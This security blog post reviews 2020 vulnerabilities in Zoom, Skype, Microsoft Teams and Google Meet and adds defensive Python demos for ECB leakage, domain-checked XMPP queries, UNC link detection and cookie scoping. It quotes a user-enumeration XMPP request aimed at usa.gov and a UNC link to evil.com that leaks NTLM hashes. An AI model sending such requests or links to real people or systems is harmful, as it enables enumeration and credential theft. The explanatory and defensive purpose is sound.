The basic requirements for video conferencing services are quality, reliability and security. While the first two are broadly comparable across the major players, the security picture differs significantly. In this post we look at how protection works in the most widely used services: Zoom, Skype, Microsoft Teams and Google Meet.

Since the start of the pandemic, all video conferencing services have experienced explosive user growth:

The increase in the value of Zoom Video shares since the start of the pandemic. Source: Investing.com

However, the massive demand not only drove up these companies' share prices but also clearly exposed security problems in the services that nobody had thought about before. Some of the problems stem from the quality of the programmers' work and can lead to remote code execution. Others are rooted in flawed architectural decisions that open the service to malicious use.

Zoom


Zoom Video burst into the video conferencing market and quickly became the leader. Unfortunately, it led not only in the number of users but also in the number of bugs found. The situation was so dire that the armed forces and government departments of many countries banned employees from using the troubled product, and large companies followed suit. Let's consider the Zoom vulnerabilities that prompted these decisions.

Encryption Issues

Zoom declares that all video calls are protected by encryption, but the reality is less rosy: the service does use encryption, but the client requests the session key from one of the "key management system" servers that are part of Zoom's cloud infrastructure. These servers generate an encryption key and hand it to every participant who joins the conference: one key for all conference participants.

The key is transmitted from the server to the client over TLS, the same protocol used for HTTPS. If one of the participants joins Zoom from a phone, a copy of the encryption key is also sent to a further server, the Zoom telephony connector.

Some of the key management servers are located in China, and they are used to issue keys even when all conference participants are in other countries. There are justified fears that the PRC government could intercept the encrypted traffic and then decrypt it using keys obtained from the providers on a "voluntary" basis.

Another encryption problem concerns the practical implementation:

  • although the documentation states that 256-bit AES keys are used, the actual key length is only 128 bits;
  • AES is used in ECB mode, in which the ciphertext partially preserves the structure of the plaintext.

The result of image encryption using ECB mode and other AES modes. Source: Wikipedia
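An added illustration of the ECB problem (not code from the post): a toy 16-byte Feistel block cipher built on HMAC-SHA256 stands in for AES, because the point is the mode, not the cipher. Encrypting a constructed "frame" of mostly identical blocks shows that ECB keeps the repetition visible in the ciphertext while CBC hides it; the cipher, key, IV and frame are all constructed for this demo.

```python
import hashlib
import hmac

BLOCK = 16  # block size in bytes, the same as AES

def _xor(a: bytes, b: bytes) -> bytes:
    return bytes(x ^ y for x, y in zip(a, b))

def _round_fn(key: bytes, rnd: int, half: bytes) -> bytes:
    # Keyed round function: HMAC-SHA256 truncated to half a block.
    return hmac.new(key, bytes([rnd]) + half, hashlib.sha256).digest()[:8]

def block_encrypt(key: bytes, block: bytes) -> bytes:
    # Toy 4-round Feistel cipher standing in for AES (a permutation of the
    # 16-byte block, but NOT a secure cipher; demo only).
    l, r = block[:8], block[8:]
    for rnd in range(4):
        l, r = r, _xor(l, _round_fn(key, rnd, r))
    return l + r

def _blocks(data: bytes) -> list:
    assert len(data) % BLOCK == 0, "input must be block-aligned"
    return [data[i:i + BLOCK] for i in range(0, len(data), BLOCK)]

def ecb_encrypt(key: bytes, data: bytes) -> bytes:
    # ECB: every block is encrypted independently with the same key, so equal
    # plaintext blocks give equal ciphertext blocks and structure shows through.
    return b"".join(block_encrypt(key, b) for b in _blocks(data))

def cbc_encrypt(key: bytes, iv: bytes, data: bytes) -> bytes:
    # CBC: each block is XORed with the previous ciphertext block (or the IV)
    # before encryption, so repeated plaintext no longer repeats in the output.
    out, prev = [], iv
    for b in _blocks(data):
        prev = block_encrypt(key, _xor(prev, b))
        out.append(prev)
    return b"".join(out)

def repeated_block_ratio(ct: bytes) -> float:
    # Fraction of ciphertext blocks that duplicate another block: a quick
    # "does the structure leak?" check a reviewer can run on captured data.
    bs = _blocks(ct)
    return 1 - len(set(bs)) / len(bs)

# Constructed sample "frame": 30 identical background blocks plus 2 distinct ones.
FRAME = b"\x00" * (BLOCK * 30) + bytes(range(16)) + bytes(range(16, 32))
KEY = b"constructed-demo-key"   # constructed, not a real key
IV = b"\x11" * BLOCK            # constructed; real CBC needs a random IV
```

With the constructed frame, about 90% of the ECB ciphertext blocks are duplicates of each other, which is exactly the pattern visible in the Wikipedia image above; the CBC output has none.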

A 500 thousand dollar vulnerability

In mid-April 2020, two zero-day vulnerabilities were discovered in the Zoom clients for Windows and macOS. The Windows client RCE vulnerability was immediately put up for sale for 500 thousand US dollars. To exploit the bug, the attacker must call the victim or take part in the same conference as her.

The macOS client vulnerability offered no such opportunities, so its use in real attacks is unlikely.

Responses to Unauthorized XMPP Requests

At the end of April 2020, another vulnerability was found in Zoom: with a specially crafted XMPP request, anyone could obtain a list of all service users belonging to any domain. For example, one could obtain the list of user addresses in the usa.gov domain by sending an XMPP request of the form:

  <iq id='{XXXX}' type='get' from='any_username@xmpp.zoom.us/ZoomChat_pc' xmlns='jabber:client'>
    <query xmlns='zoom:iq:group' chunk='1' directory='1'>
      <group id='usa.gov' version='0' option='0'/>
    </query>
  </iq>

The application simply did not check the domain of the user requesting the address list.
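The server-side check that was missing, as an added example (not Zoom's code): the stanza quoted above is parsed, and the directory is handed out only when the requested group domain equals the organisation domain of the authenticated session, which must come from the server's own session state and never from the client-controlled 'from' JID. The directory, sessions and stanza id are constructed for the demo.

```python
import xml.etree.ElementTree as ET

NS_CLIENT = "{jabber:client}"
NS_GROUP = "{zoom:iq:group}"

# Constructed sample directory; the addresses are made up for the demo.
DIRECTORY = {
    "usa.gov": ["alice@usa.gov", "bob@usa.gov"],
    "example.org": ["carol@example.org"],
}

def requested_group(stanza: str) -> str:
    """Extract the group id (a domain) from a zoom:iq:group directory query."""
    iq = ET.fromstring(stanza)
    if iq.tag != NS_CLIENT + "iq" or iq.get("type") != "get":
        raise ValueError("not an <iq type='get'> stanza")
    group = iq.find(f"{NS_GROUP}query[@directory='1']/{NS_GROUP}group")
    if group is None or not group.get("id"):
        raise ValueError("no directory group id in the query")
    return group.get("id").strip().lower()

def list_users_vulnerable(stanza: str, session: dict) -> list:
    # The behaviour the post describes: whatever domain the client puts in
    # <group id=...> is returned, and the session is never consulted.
    return list(DIRECTORY.get(requested_group(stanza), []))

def list_users_hardened(stanza: str, session: dict) -> list:
    # Hardened: the requester's organisation domain comes from the server-side
    # authenticated session, never from the client-controlled 'from' JID, and
    # the directory is returned only for that same domain.
    group = requested_group(stanza)
    if group != session["org_domain"].lower():
        raise PermissionError(f"{session['org_domain']} may not list {group}")
    return list(DIRECTORY.get(group, []))

# The request shape quoted in the post, with a constructed stanza id.
REQUEST = (
    "<iq id='demo-1' type='get' from='any_username@xmpp.zoom.us/ZoomChat_pc' "
    "xmlns='jabber:client'><query xmlns='zoom:iq:group' chunk='1' directory='1'>"
    "<group id='usa.gov' version='0' option='0'/></query></iq>"
)
# Constructed sessions: an outsider from another organisation and an insider.
OUTSIDER = {"jid": "any_username@xmpp.zoom.us", "org_domain": "example.org"}
INSIDER = {"jid": "alice@xmpp.zoom.us", "org_domain": "usa.gov"}
```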

Taking control of macOS

Two vulnerabilities were found in the Zoom client for macOS that could allow an attacker to take control of the device.

  1. The Zoom installer used a "shadow installation" technique, often used by malware to install without user interaction. A local unprivileged attacker could inject malicious code into the Zoom installer and gain root privileges.
  2. By injecting malicious code into the installed Zoom client, an attacker could use the camera and microphone access already granted to the application, with no additional prompts or notifications shown.

UNC Vulnerability in Windows Client

A vulnerability found in the Zoom client for Windows could leak user credentials through UNC links. The reason is that the Zoom Windows client turned UNC paths into clickable links, so if someone posted a link like \\evil.com\img\kotik.jpg in chat, Windows would try to connect to that host over SMB to open the file kotik.jpg. The remote host then receives the username and NTLM hash from the local computer, which can be cracked with Hashcat or other tools.

Using the same technique it was possible to launch practically any program on the local computer. For example, the link \\127.0.0.1\C$\windows\system32\calc.exe starts the calculator.
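An added example (not Zoom's code) of the check a chat client or a chat-log monitor can apply: it finds UNC paths in a message, labels the risk by host, and models the difference between a client that turns UNC paths into links (the behaviour described above) and one that leaves them as plain text. The chat lines are constructed and reuse the two paths quoted in the post.

```python
import re

# Matches \\host\share[\more\path] where host is a DNS name or IPv4 literal.
UNC_RE = re.compile(r"\\\\([A-Za-z0-9.\-]+)\\([^\s\\]+)((?:\\[^\s\\]*)*)")
URL_RE = re.compile(r"https?://[^\s]+")

LOOPBACK = {"127.0.0.1", "localhost"}

def find_unc_paths(message: str) -> list:
    """Return one finding per UNC path in a chat message, with a risk label."""
    findings = []
    for m in UNC_RE.finditer(message):
        host, share = m.group(1), m.group(2)
        if host.lower() in LOOPBACK:
            risk = "loopback host: link points at a local file or program"
        else:
            risk = "remote host: an SMB connection would expose the NTLM credential"
        findings.append({"path": m.group(0), "host": host, "share": share, "risk": risk})
    return findings

def clickable_targets(message: str, linkify_unc: bool) -> list:
    """Targets a chat client would turn into links. linkify_unc=True models
    the behaviour the post describes; False is the hardened behaviour, where
    only http(s) URLs become links and UNC paths stay plain text."""
    targets = URL_RE.findall(message)
    if linkify_unc:
        targets += [m.group(0) for m in UNC_RE.finditer(message)]
    return targets

# Constructed chat lines reusing the two paths quoted in the post.
CHAT_LINES = [
    r"look at this https://example.com/cat.png and \\evil.com\img\kotik.jpg",
    r"try \\127.0.0.1\C$\windows\system32\calc.exe",
]
```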

Video Call Leaks

In early April, recordings of private Zoom video calls appeared openly on YouTube and Vimeo. They included school lessons, psychotherapy sessions and medical consultations, as well as corporate meetings.
The reason for the leak was that the service assigned conferences open identifiers, and the conference organizers did not protect access to them with a password. Anyone could download the recordings and use them as they pleased.

Zoombombing

This is a case where insufficient attention to the default security settings of conferences leads to sad consequences. To join any Zoom video call it was enough to know the meeting identifier, and pranksters began exploiting this en masse. They burst into online lessons and practised their brand of "wit" there, for example sharing a screen with a porn film or scribbling obscene images over the document on the teacher's screen.

Then it turned out that the problem was much wider than disrupted online lessons. Journalists at The New York Times found private chats and threads on Reddit and 4chan in which participants ran mass campaigns to disrupt public events, online Alcoholics Anonymous meetings and other Zoom meetings. They searched for publicly accessible connection details and then invited other trolls to join the "fun".

Working on the bugs

The mass refusals to use the service forced Zoom to take emergency measures. In a CNN interview in early April, Zoom CEO Eric Yuan said that the company had been moving too fast and had therefore made some mistakes. Having learned the lesson, they took a step back to focus on privacy and security.

Under the "90 days to security" program, on April 1, 2020 Zoom halted work on new features and concentrated on eliminating the identified problems and auditing code security.
The result of these measures was the release of Zoom version 5.0, which, among other things, upgraded AES encryption to 256 bits and implemented many other improvements to default security.

Skype


Despite the rapid growth in user numbers, Skype appeared only once in this year's information security news, and even then not because of a vulnerability. In January 2020 a former contractor told The Guardian that for several years Microsoft had been listening to and processing the voice recordings of Skype and Cortana users without any security measures. However, this first became known back in August 2019, and even then Microsoft representatives explained that voice data is collected to support and improve its voice services: search and voice command recognition, speech translation and transcription.

The result of a search in the vulnerability database for Skype. Source: cve.mitre.org/cgi-bin/cvekey.cgi?keyword=Skype

As for vulnerabilities, according to the CVE database none were found in Skype in 2020.

MS Teams


Microsoft pays a lot of attention to the security of its products, including MS Teams (although the opposite opinion is widespread). The following vulnerabilities were discovered and fixed in Teams in 2019-2020:

1. CVE-2019-5922 is a vulnerability in the Teams installer that allowed an attacker to slip it a malicious DLL and gain privileges on the target system, because the installer did not verify which DLL was in its folder.

2. A vulnerability in the Microsoft Teams platform allowed an attacker to compromise a user account with a picture.

Scheme of attack on MS Teams using a picture. Source: www.cyberark.com/resources/threat-research-blog/beware-of-the-gif-account-takeover-vulnerability-in-microsoft-teams

The root of the problem was how Teams handles image access tokens. Two tokens are used for user authentication: authtoken and skypetoken. The authtoken lets the user load images in the Teams and Skype domains and is used to generate a skypetoken, which authenticates to the server that processes commands from the client, for example reading or sending messages.

An attacker who intercepts both tokens can make Teams API calls and gain full control over the account:

  • read and send messages,
  • create groups,
  • add and remove users,
  • change permissions.

To intercept them, it was enough to lure the victim, by means of a GIF file, to a subdomain of teams.microsoft.com controlled by the attacker. The victim's browser would then send the authtoken to the attacker, who could use it to create a skypetoken.

3. Several vulnerabilities discovered by Tenable researchers in the Praise Cards component and in chat windows allowed code injection for unauthorized changes to settings and for theft of user credentials. Microsoft did not issue separate advisories for these problems, fixing them in a new version of the application.
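Why a browser hands the token to an attacker's subdomain, as an added example (not Microsoft's code): it assumes, as the post implies, that the authtoken is a browser cookie scoped to the parent domain teams.microsoft.com. The functions implement the domain-matching rule browsers apply (RFC 6265, section 5.1.3) and compare a parent-domain-scoped cookie with a host-only one; the cookie records and the taken-over subdomain name are constructed and hypothetical.

```python
def domain_matches(request_host: str, cookie_domain: str) -> bool:
    """RFC 6265 section 5.1.3: does request_host domain-match cookie_domain?"""
    request_host = request_host.lower()
    cookie_domain = cookie_domain.lower().lstrip(".")
    if request_host == cookie_domain:
        return True
    # Suffix match on a label boundary; the request host must be a name,
    # not an IPv4 literal (a simplified check, enough for this demo).
    return (request_host.endswith("." + cookie_domain)
            and not request_host.replace(".", "").isdigit())

def cookie_sent_to(cookie: dict, request_host: str) -> bool:
    """Would the browser attach this cookie to a request for request_host?"""
    if cookie.get("domain"):
        # Domain attribute set: a "domain cookie", shared with every subdomain,
        # including one an attacker has taken over.
        return domain_matches(request_host, cookie["domain"])
    # No Domain attribute: a "host-only" cookie, sent only to the host that set it.
    return request_host.lower() == cookie["set_by"].lower()

def exposed_hosts(cookie: dict, hosts: list) -> list:
    """Which of the given hosts would receive the cookie."""
    return [h for h in hosts if cookie_sent_to(cookie, h)]

# Constructed cookie records modelling the two scoping choices for the authtoken.
AUTHTOKEN_DOMAIN_SCOPED = {"name": "authtoken", "set_by": "teams.microsoft.com",
                           "domain": "teams.microsoft.com"}
AUTHTOKEN_HOST_ONLY = {"name": "authtoken", "set_by": "teams.microsoft.com",
                       "domain": None}

# Hypothetical hosts; the second stands for a subdomain an attacker controls.
HOSTS = [
    "teams.microsoft.com",
    "hijacked-subdomain.teams.microsoft.com",   # hypothetical name
    "teams.microsoft.com.attacker.example",     # look-alike, a different site
    "login.microsoft.com",
]
```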

Google Meet


Unlike competing services, Google Meet runs entirely in the browser. Thanks to this, over the past two years Google's video conferencing has never featured in information security news. Even the 30-fold increase in the number of users caused by the pandemic did not reveal vulnerabilities affecting their security.

Our recommendations


Using any program requires a responsible attitude to security, and video conferencing tools are no exception. Here are some guidelines to help protect your online meetings:

  1. use the latest software versions,
  2. download installers only from official sources,
  3. don't post meeting IDs online,
  4. protect your accounts with two-factor authentication,
  5. allow only authorized users to join meetings,
  6. close the meeting to new connections after it has started,
  7. let the organizer block or remove meeting participants,
  8. use modern anti-virus solutions that provide comprehensive protection against new and known threats.

Following these rules of online hygiene for video conferencing will let you work efficiently and safely even in the most difficult periods.
